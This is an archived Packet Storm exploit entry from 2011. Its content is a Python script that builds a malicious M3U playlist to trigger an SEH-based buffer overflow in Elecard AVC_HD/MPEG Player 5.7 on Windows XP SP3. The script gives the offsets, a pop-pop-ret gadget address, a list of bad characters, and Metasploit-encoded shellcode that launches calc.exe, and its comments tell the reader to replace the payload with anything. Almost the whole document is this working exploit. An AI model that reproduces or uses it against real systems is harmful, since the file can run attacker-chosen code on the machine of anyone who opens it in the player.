Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow

2011-02-27T00:00:00
ID PACKETSTORM:98772
Type packetstorm
Reporter sickness
Modified 2011-02-27T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
# Software: Elecard AVC_HD/MPEG Player 5.7 (SEH)  
# Author: sickness  
# Download : http://www.elecard.com/en/products/end-user-software/playback/avchd-player.html  
# PoC for Elecard MPEG: http://www.exploit-db.com/exploits/16237/  
# Tested : Windows XP Professional SP3 (EN) latest updates  
# DATE : 26/02/2011  
# Bad chars: \x00\x0a\x0d\x25\x68\x08 There might be more so watch out !  
###################################################################  
# You might need to change the offset.  
# The payload can be replaced with whatever you want, there is enough space.  
###################################################################  
  
import sys  
  
header="#EXTM3U\n"  
  
junk="\x42"*4  
nseh="\xeb\x06\x90\x90"  
seh="\xA6\xA0\x94\x73" # p/p/r from D3DIM700.DLL  
nops = "\x90"*16  
  
# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "\x00\x0a\x0d\x25\x68\x08" -t c  
sc = ("\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd\x1e"  
"\x9f\xec\x83\xeb\xfc\xe2\xf4\x01\xf6\x16\xec\xfd\x1e\xff\x65"  
"\x18\x2f\x4d\x88\x76\x4c\xaf\x67\xaf\x12\x14\xbe\xe9\x95\xed"  
"\xc4\xf2\xa9\xd5\xca\xcc\xe1\xae\x2c\x51\x22\xfe\x90\xff\x32"  
"\xbf\x2d\x32\x13\x9e\x2b\x1f\xee\xcd\xbb\x76\x4c\x8f\x67\xbf"  
"\x22\x9e\x3c\x76\x5e\xe7\x69\x3d\x6a\xd5\xed\x2d\x4e\x14\xa4"  
"\xe5\x95\xc7\xcc\xfc\xcd\x7c\xd0\xb4\x95\xab\x67\xfc\xc8\xae"  
"\x13\xcc\xde\x33\x2d\x32\x13\x9e\x2b\xc5\xfe\xea\x18\xfe\x63"  
"\x67\xd7\x80\x3a\xea\x0e\xa5\x95\xc7\xc8\xfc\xcd\xf9\x67\xf1"  
"\x55\x14\xb4\xe1\x1f\x4c\x67\xf9\x95\x9e\x3c\x74\x5a\xbb\xc8"  
"\xa6\x45\xfe\xb5\xa7\x4f\x60\x0c\xa5\x41\xc5\x67\xef\xf5\x19"  
"\xb1\x97\x1f\x12\x69\x44\x1e\x9f\xec\xad\x76\xae\x67\x92\x99"  
"\x60\x39\x46\xee\x2a\x4e\xab\x76\x39\x79\x40\x83\x60\x39\xc1"  
"\x18\xe3\xe6\x7d\xe5\x7f\x99\xf8\xa5\xd8\xff\x8f\x71\xf5\xec"  
"\xae\xe1\x4a\x8f\x9c\x72\xfc\xc2\x98\x66\xfa\xec")  
rest = "\x90"*(21000-len(header+junk+nseh+seh+nops+sc))  
  
exploit = header +junk + nseh + seh + nops + sc + rest  
  
try:  
f=open("evil.m3u","w")  
f.write(exploit)  
f.close()  
print "Done!"  
except:  
print "Something went wrong!"  
  
`